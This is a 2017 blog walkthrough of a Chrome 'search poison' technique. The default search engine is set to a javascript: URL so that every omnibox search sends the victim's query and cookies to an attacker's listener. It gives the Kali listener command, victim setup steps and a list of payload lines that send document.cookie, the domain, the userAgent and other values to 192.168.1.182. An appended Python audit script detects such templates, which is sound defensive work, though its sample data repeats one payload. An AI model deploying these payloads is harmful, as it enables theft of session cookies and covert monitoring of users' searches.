metalkey

Google Chrome Search Poison – Default Search Engine Exploit

August 27, 2017

Introduction

In December 2015, I discovered a weakness in Google Chrome's default search engine feature that allows attacker-chosen JavaScript to execute whenever the victim performs a search from the omnibox (the URL bar).
The JavaScript can be set to perform various functions, including cookie stealing, interception of search keywords and browser fingerprinting.
In this walkthrough we set up Python's SimpleHTTPServer and intercept the victim's cookies and search keywords.

Note: The issue was reported to the Google/Chromium team, who considered it a feature rather than a vulnerability.

Video Demo

The video demonstration shows the Chrome master-preferences file being manipulated to infect the user with the malicious search engine. The user is then directed to the attacker's Apache server, which extracts the search query, cookies and other system information and seamlessly redirects them back to their search.

Walkthrough - Setting up the Listener in Kali

root@kali:~$ python -m SimpleHTTPServer 80

Setup on Victim Machine

  1. Go into "Settings" in Google Chrome
  2. Click on "Manage Search Engines"
  3. Enter your malicious JS and click "Make Default"

Example

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);

Note: 192.168.1.182 is our SimpleHTTPServer.
Now, whenever the victim searches from Google Chrome's omnibox, the JavaScript runs and forwards their cookie and the search string (%s) to you.

Other examples

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);
javascript:window.location='http://192.168.1.182/%s'+escape(document.baseURI);
javascript:window.location='http://192.168.1.182/%s'+escape(document.domain);
javascript:window.location='http://192.168.1.182/%s'+escape(document.URL);
javascript:window.location='http://192.168.1.182/%s'+escape(location.host);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appCodeName);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appName);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.appVersion);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.platform);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.userAgent);
javascript:window.location='http://192.168.1.182/%s'+escape(navigator.product);
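As an added defensive example (not part of the original post), the Python script below audits a Chrome profile's search engine table for templates that use a script scheme like the ones above and reports the host that would receive the search. The table layout (the 'keywords' table of the profile's 'Web Data' SQLite file, reduced to three columns) is an assumption, and all rows are constructed for the demonstration.

```python
"""Audit Chrome search-engine templates for script-scheme URLs (added example)."""
import re
import sqlite3
from urllib.parse import urlsplit

# Schemes that run code or read local files instead of making a web request.
SCRIPT_SCHEMES = {"javascript", "data", "vbscript", "file"}
EXFIL_RE = re.compile(r"https?://[^\s'\"]+")

def classify_template(template):
    """Return 'script', 'insecure' or 'ok' for one search URL template."""
    scheme = urlsplit(template.strip()).scheme.lower()
    if scheme in SCRIPT_SCHEMES:
        return "script"
    if scheme == "http":        # query terms leave the machine in clear
        return "insecure"
    return "ok"                 # https, or a Chrome {google:baseURL} stub

def exfil_hosts(template):
    """Hosts embedded in the template that would receive the search."""
    return sorted({urlsplit(u).hostname for u in EXFIL_RE.findall(template)})

def audit_keywords(conn):
    """Scan the keywords table; return (name, verdict, hosts) for bad rows."""
    findings = []
    for name, url in conn.execute("SELECT short_name, url FROM keywords"):
        verdict = classify_template(url)
        if verdict != "ok":
            findings.append((name, verdict, exfil_hosts(url)))
    return findings

def build_sample_db():
    """In-memory stand-in for Chrome's 'Web Data' file: the real 'keywords'
    table has more columns (simplified assumption); all rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE keywords (short_name TEXT, keyword TEXT, url TEXT)")
    conn.executemany("INSERT INTO keywords VALUES (?, ?, ?)", [
        ("Google", "google.com", "{google:baseURL}search?q={searchTerms}"),
        ("DuckDuckGo", "duckduckgo.com", "https://duckduckgo.com/?q={searchTerms}"),
        ("Intranet", "wiki", "http://wiki.internal/search?q={searchTerms}"),
        ("Google", "g", "javascript:window.location='http://192.168.1.182/%s'"
                        "+escape(document.cookie);"),   # this page's poisoned engine
    ])
    return conn

if __name__ == "__main__":
    for name, verdict, hosts in audit_keywords(build_sample_db()):
        print(f"{verdict:8} {name!r:12} -> {hosts}")
```

Against a real profile, open a copy of the 'Web Data' file with sqlite3 while Chrome is closed; a user-visible engine name that matches a legitimate provider but carries a javascript: template is the pattern this page describes.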

Tags: search-poison